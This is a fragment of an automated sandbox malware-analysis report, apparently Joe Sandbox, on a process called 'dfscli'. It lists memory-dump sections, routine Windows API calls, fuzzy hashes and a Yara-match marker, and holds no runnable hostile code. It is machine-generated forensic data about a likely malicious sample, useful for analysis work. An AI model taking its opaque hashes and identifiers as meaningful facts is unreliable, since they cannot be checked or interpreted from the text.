                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                  • String ID: MS Shell Dlg
                                                                  • API String ID: 2364537584-76309092
                                                                  • Opcode ID: 9646e25077798d77b5deeb05f9c54692e781d64a2f7a8cb0eff1768c936a2d1f
                                                                  • Instruction ID: e5cb62502933813201733bd9fc32693ef396ee62b0366fab134f26ca96ffc902
                                                                  • Opcode Fuzzy Hash: 9646e25077798d77b5deeb05f9c54692e781d64a2f7a8cb0eff1768c936a2d1f
                                                                  • Instruction Fuzzy Hash: F551B431B00229DFCB14EFA5E8459EEBBF4AF44314F94456BF502E7292D7388981CB59
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: _strncpy$_strcspn
                                                                  • String ID: ,$,$.$_$_.,
                                                                  • API String ID: 209312476-1893563293
                                                                  • Opcode ID: 2e43a5f81b777912afccb140e69afc6829ec4401cf3e0a016be81a25e8608456
                                                                  • Instruction ID: 094b99d490e66d553d3a6f78acc3330e94534354dd0d36d43b286bc5cd0e5350
                                                                  • Opcode Fuzzy Hash: 2e43a5f81b777912afccb140e69afc6829ec4401cf3e0a016be81a25e8608456
                                                                  • Instruction Fuzzy Hash: 6F216B315C0A06EDEF308A64C881BEB3758AF913E4F584717F8498A281D33CA9C5C79D
                                                                  APIs
                                                                  • GetStockObject.GDI32(00000011), ref: 00425AB0
                                                                  • GetStockObject.GDI32(0000000D), ref: 00425AB8
                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 00425AC5
                                                                  • GetDC.USER32(00000000), ref: 00425AD4
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00425AE8
                                                                  • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00425AF4
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00425AFF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Stock$CapsDeviceRelease
                                                                  • String ID: System
                                                                  • API String ID: 46613423-3470857405
                                                                  • Opcode ID: fe69864a35ea89a40515d5fc80cfd6c8ee3fb8849cac013ddd10af84c3ff34a8
                                                                  • Instruction ID: ffff926d86ea4a8282c210a474db753b18fb332d241bf638c921fd37c398010f
                                                                  • Opcode Fuzzy Hash: fe69864a35ea89a40515d5fc80cfd6c8ee3fb8849cac013ddd10af84c3ff34a8
                                                                  • Instruction Fuzzy Hash: 6B115471B00228EBEB20DFA1ED85FAE7B78AF04744F404125F605A71D0D7B49D42CBA8
                                                                  APIs
                                                                  • CompareStringW.KERNEL32(00000000,00000000,004322C4,00000001,004322C4,00000001,00433B18,00000040,00419FC8,?,00000001,?,00000000,?,00000000,?), ref: 0041ACE8
                                                                  • GetLastError.KERNEL32(?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018,00000000,?,?,0000016D,00000000,?), ref: 0041ACFA
                                                                  • GetCPInfo.KERNEL32(00000000,00000000,00433B18,00000040,00419FC8,?,00000001,?,00000000,?,00000000,?,^@,004176DC,00000000,00000000), ref: 0041ADA4
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AE32
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEC8
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,?,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AF3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                  • String ID:
                                                                  • API String ID: 1773772771-0
                                                                  • Opcode ID: 5a6277f7f7645b34a1ca5d23e9bca92d5f01ef7ed54ed092bd0c7847a4edd101
                                                                  • Instruction ID: f5f744d86d54cd8ca6db1966468d69e19fe399d0adc8f6adef735f185170d353
                                                                  • Opcode Fuzzy Hash: 5a6277f7f7645b34a1ca5d23e9bca92d5f01ef7ed54ed092bd0c7847a4edd101
                                                                  • Instruction Fuzzy Hash: D0B1C471901209AFCF21DF65DC41AEF7BB6EF08354F14012BF811A62A0D73989E5CB9A
                                                                  APIs
                                                                  • __allrem.LIBCMT ref: 0040F614
                                                                  • __allrem.LIBCMT ref: 0040F62C
                                                                  • __allrem.LIBCMT ref: 0040F648
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F683
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F69F
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F6B6
                                                                    • Part of subcall function 004150CA: __lock.LIBCMT ref: 004150E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                  • String ID: ^@
                                                                  • API String ID: 4106114094-3067454934
                                                                  • Opcode ID: f69c0a922e78807a0b225c01b9b7e650e9e6c5e0ad57cf8c216420461cf175c5
                                                                  • Instruction ID: 0793e8c0385b27168c5ed49dc395ad643d610412e7e07f13e1331a588879ac93
                                                                  • Opcode Fuzzy Hash: f69c0a922e78807a0b225c01b9b7e650e9e6c5e0ad57cf8c216420461cf175c5
                                                                  • Instruction Fuzzy Hash: 54719F75E00209BFDB24DFA9CC81B9EB7B6EB84314F14817AF510F3691D3789A448B59
                                                                  APIs
                                                                    • Part of subcall function 004148BE: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414930
                                                                  • __allrem.LIBCMT ref: 0040F8CC
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F8ED
                                                                  • __allrem.LIBCMT ref: 0040F909
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F92C
                                                                  • __allrem.LIBCMT ref: 0040F948
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F96B
                                                                    • Part of subcall function 00415116: __lock.LIBCMT ref: 00415124
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                  • String ID: ^@
                                                                  • API String ID: 1282128132-3067454934
                                                                  • Opcode ID: 503f9c629e17bedf12aa749e16a2be0b44da8eaeb40d5e21e031042d8dcd9b81
                                                                  • Instruction ID: 6440d212c24c971b3252e86089126bc21e948c25b89904ef9f819ef4e6195108
                                                                  • Opcode Fuzzy Hash: 503f9c629e17bedf12aa749e16a2be0b44da8eaeb40d5e21e031042d8dcd9b81
                                                                  • Instruction Fuzzy Hash: 9C61B3B2900605EFDB24DF69C880AAEB7F5EB84314F24853FE455E3791D7349E898B48
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00408DE6
                                                                    • Part of subcall function 0040780C: CoGetClassObject.OLE32(?,?,00000000,00433C4C,?), ref: 0040782C
                                                                    • Part of subcall function 00426B5A: __EH_prolog.LIBCMT ref: 00426B5F
                                                                    • Part of subcall function 00426B15: __EH_prolog.LIBCMT ref: 00426B1A
                                                                  • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00408F6F
                                                                  • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00408F90
                                                                  • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00408FE3
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00408FF1
                                                                  • GlobalUnlock.KERNEL32(?), ref: 00409009
                                                                  • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 0040902C
                                                                  • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 00409048
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
                                                                  • String ID:
                                                                  • API String ID: 645133905-0
                                                                  • Opcode ID: 005b3a7b1ba1e7ec0c156c389e7c3750a11e397c02a4dfee90b0cb540f4121ed
                                                                  • Instruction ID: adf4c40781447d7e631396cda822757ebb0fe2e859268748525afa0d866fb1c1
                                                                  • Opcode Fuzzy Hash: 005b3a7b1ba1e7ec0c156c389e7c3750a11e397c02a4dfee90b0cb540f4121ed
                                                                  • Instruction Fuzzy Hash: D8C11A70A00209EFCF14DF65C9889AEBBBAFF88304B10456AF811EB291D779DD41CB65
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 00414AF6
                                                                    • Part of subcall function 004108E8: EnterCriticalSection.KERNEL32(?,?,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00410910
                                                                  • _strlen.LIBCMT ref: 00414B68
                                                                  • _strcat.LIBCMT ref: 00414B85
                                                                  • _strncpy.LIBCMT ref: 00414B9E
                                                                    • Part of subcall function 0040E502: __lock.LIBCMT ref: 0040E520
                                                                    • Part of subcall function 0040E502: HeapFree.KERNEL32(00000000,?,00431A60,0000000C,004108CC,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010), ref: 0040E567
                                                                  • GetTimeZoneInformation.KERNEL32(0043F808,00432298,00000018,004150F8,004322A8,00000008,0040F746,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 00414C07
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0043F80C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,?), ref: 00414C95
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0043F860,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,?), ref: 00414CC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strcat_strlen_strncpy
                                                                  • String ID:
                                                                  • API String ID: 3757401926-0
                                                                  • Opcode ID: a12a00952cfbe2cbfe0e02be742bc80dcd0c2f8750305a48b7d58f6abd9f11fa
                                                                  • Instruction ID: b88b56355e109a379969b639f8961749b468b39d063f6cbed0312a5d21008a68
                                                                  • Opcode Fuzzy Hash: a12a00952cfbe2cbfe0e02be742bc80dcd0c2f8750305a48b7d58f6abd9f11fa
                                                                  • Instruction Fuzzy Hash: 1B7137319042419EDB28AF29FC85B967BE5E785310F64253BE850E72E1E73C48C2CB5D
                                                                  APIs
                                                                  • SetLastError.KERNEL32(0000007F), ref: 021C14DB
                                                                  • SetLastError.KERNEL32(0000007F), ref: 021C1507
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1452528299-0
                                                                  • Opcode ID: 2ff42435e9c1128df88de3cde3dbb1a97e46d6a2bb984d43cf9e365cf9cc3bbf
                                                                  • Instruction ID: 4ebed1f44929cc9d0b7056100264d81e218fb4ba4fc3f7b9b10317cdea554e75
                                                                  • Opcode Fuzzy Hash: 2ff42435e9c1128df88de3cde3dbb1a97e46d6a2bb984d43cf9e365cf9cc3bbf
                                                                  • Instruction Fuzzy Hash: F071FB78E80119EFDB08DF94C580BADB7B2FF58304F248598D51AAB342D774AA91DF90
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(00000000,?,00432B10,00000038,00415751,?,00000000,00000000,0040FE1B,00000000,00000000,004322F0,0000001C,0040FB4A,00000001,00000020), ref: 0041777B
                                                                  • GetCPInfo.KERNEL32(00000000,00000001), ref: 0041778E
                                                                  • _strlen.LIBCMT ref: 004177B2
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,0040FE1B,?,00000000,00000000), ref: 004177D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Info$ByteCharMultiWide_strlen
                                                                  • String ID:
                                                                  • API String ID: 1335377746-0
                                                                  • Opcode ID: 16f72e5b873a4ab48f6271f059b37c8091238466f59f76de78d94d45d57762bb
                                                                  • Instruction ID: c96e7402d8f87136a9c376d92da51b645b4312610aa90fcb7a9bffc7d4a68029
                                                                  • Opcode Fuzzy Hash: 16f72e5b873a4ab48f6271f059b37c8091238466f59f76de78d94d45d57762bb
                                                                  • Instruction Fuzzy Hash: 25518E70A04218EBDF21AFA6DC89DEFBBB9EF84354F24412BF415A2290D7345D91CB64
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00426D37
                                                                    • Part of subcall function 0040D93F: __EH_prolog.LIBCMT ref: 0040D944
                                                                  • GetCapture.USER32 ref: 0042750F
                                                                  • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 00427528
                                                                  • GetFocus.USER32 ref: 0042753A
                                                                  • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 00427546
                                                                  • GetLastActivePopup.USER32(?), ref: 0042756D
                                                                  • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 00427578
                                                                  • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0042759C
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$H_prolog$ActiveCaptureFocusLastPopup
                                                                  • String ID:
                                                                  • API String ID: 2915395904-0
                                                                  • Opcode ID: 985eb66304feea1a64375c5613d292e13957ddd9534c99a91611df43f47409d5
                                                                  • Instruction ID: 19a528a7567d654ee424c3ff896293cafdfeef5f92fb810e1dffabcbd8df109d
                                                                  • Opcode Fuzzy Hash: 985eb66304feea1a64375c5613d292e13957ddd9534c99a91611df43f47409d5
                                                                  • Instruction Fuzzy Hash: 0541F071704228BFCB24AB65EC44E7FB6A9EF44384B60043FF101D3690CB78CC829669
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32(76230A60,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412A83
                                                                  • GetLastError.KERNEL32(?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412A97
                                                                  • GetEnvironmentStringsW.KERNEL32(76230A60,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412AB9
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,76230A60,00000000,?,?,?,?,0040E927), ref: 00412AED
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412B0F
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412B28
                                                                  • GetEnvironmentStrings.KERNEL32(76230A60,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412B3E
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00412B7A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 883850110-0
                                                                  • Opcode ID: 1a7aa8cc262657e72444d06c6bde20108307b8118384107d7f56e1d07f72045c
                                                                  • Instruction ID: accb5785985df4b6819ef042d50e533d603ff3fa48001b7d390ff30f191b463a
                                                                  • Opcode Fuzzy Hash: 1a7aa8cc262657e72444d06c6bde20108307b8118384107d7f56e1d07f72045c
                                                                  • Instruction Fuzzy Hash: 9F3159726082656FD7302F759EC48BBB78CEB45394715083BF142C3250E6E86CE582BD
                                                                  APIs
                                                                  • GlobalLock.KERNEL32(?), ref: 0041F256
                                                                  • lstrcmpA.KERNEL32(?,?), ref: 0041F262
                                                                  • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0041F274
                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041F294
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041F29C
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0041F2A6
                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0041F2B3
                                                                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 0041F2CB
                                                                    • Part of subcall function 0042663E: GlobalFlags.KERNEL32(?), ref: 00426648
                                                                    • Part of subcall function 0042663E: GlobalUnlock.KERNEL32(?,00000000,?,0041F2C5,?,00000000,?,?,00000000,00000000,00000002), ref: 00426659
                                                                    • Part of subcall function 0042663E: GlobalFree.KERNEL32(?), ref: 00426664
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                  • String ID:
                                                                  • API String ID: 168474834-0
                                                                  • Opcode ID: c54c654e90a360fa660b54eee4c91334e9e2f47313cccc9f547efc29e8fe9139
                                                                  • Instruction ID: 8fa5d7953f2ec37764842a3f19103b125725ee6fb1def39efba1f66d7d1e0517
                                                                  • Opcode Fuzzy Hash: c54c654e90a360fa660b54eee4c91334e9e2f47313cccc9f547efc29e8fe9139
                                                                  • Instruction Fuzzy Hash: 51110676200104BEDB216BA6CC45DAFBABDEF84700B50046EF605D1220D73AC992DB78
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                   • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E?*$a7a&$a7a&$Ei$Ei
                                                                  • API String ID: 0-288907479
                                                                  • Opcode ID: a90822e4b0b099060805fe5c384b008ef36b3c28567d5861b868bfc87914f056
                                                                  • Instruction ID: 75f249365da1273c7830dfa8a19f86c2169207a5f2f27f1327badec8b84f03a5
                                                                  • Opcode Fuzzy Hash: a90822e4b0b099060805fe5c384b008ef36b3c28567d5861b868bfc87914f056
                                                                  • Instruction Fuzzy Hash: 3BE1BEB16243028BC71ADFE4D890A6BB3E6BBC4744F04491DE48ADB348DB74ED15CB92
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00404B4A
                                                                  • MapDialogRect.USER32(?,?), ref: 00404BD8
                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00404BF9
                                                                  • CLSIDFromString.OLE32(?,00000004), ref: 00404CF7
                                                                  • CLSIDFromProgID.OLE32(?,00000004), ref: 00404CFF
                                                                  • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 00404D9B
                                                                  • SysFreeString.OLEAUT32(?), ref: 00404DEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                  • String ID:
                                                                  • API String ID: 493809305-0
